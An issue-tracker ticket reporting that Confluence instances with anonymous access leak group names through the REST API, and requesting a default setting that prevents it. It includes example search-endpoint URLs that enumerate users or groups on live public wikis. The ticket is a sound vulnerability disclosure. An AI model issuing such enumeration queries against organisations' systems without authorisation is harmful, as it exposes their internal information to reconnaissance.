Confluence leaks group names when anonymous access is enabled

XMLWordPrintable

    • 2

      Issue Summary

      As a side effect of allowing anonymous access to Confluence, the REST API leaks information such as group names. If your organisation uses this information for verification or authentication in other areas then this information could be used to compromise or attack. There may also be information contained in group names that would violate the GDPR regulations by making it freely available.

      Environment

      Any Confluence instance that is has anonymous access allowed at some level. There are some online examples below:

      https://wiki.akraino.org/rest/prototype/1/search/user-or-group.json?max-results=50&query=a
      https://confluence.atlassian.com/rest/prototype/1/search/user-or-group.json?max-results=50&query=a

      Suggested behaviour

      The ability to prevent this information from leaking when anonymous access is enabled. There are some external infrastructure changes that could be made to prevent this access, but it is not always a given that this could be implemented in the instance concerned. This should be part of Confluence's default settings.

        1. group-names.png
          group-names.png
          184 kB

            Assignee:
            Unassigned
            Reporter:
            Will Masters (Inactive)
            Votes:
            3 Vote for this issue
            Watchers:
            4 Start watching this issue

              Created:
              Updated: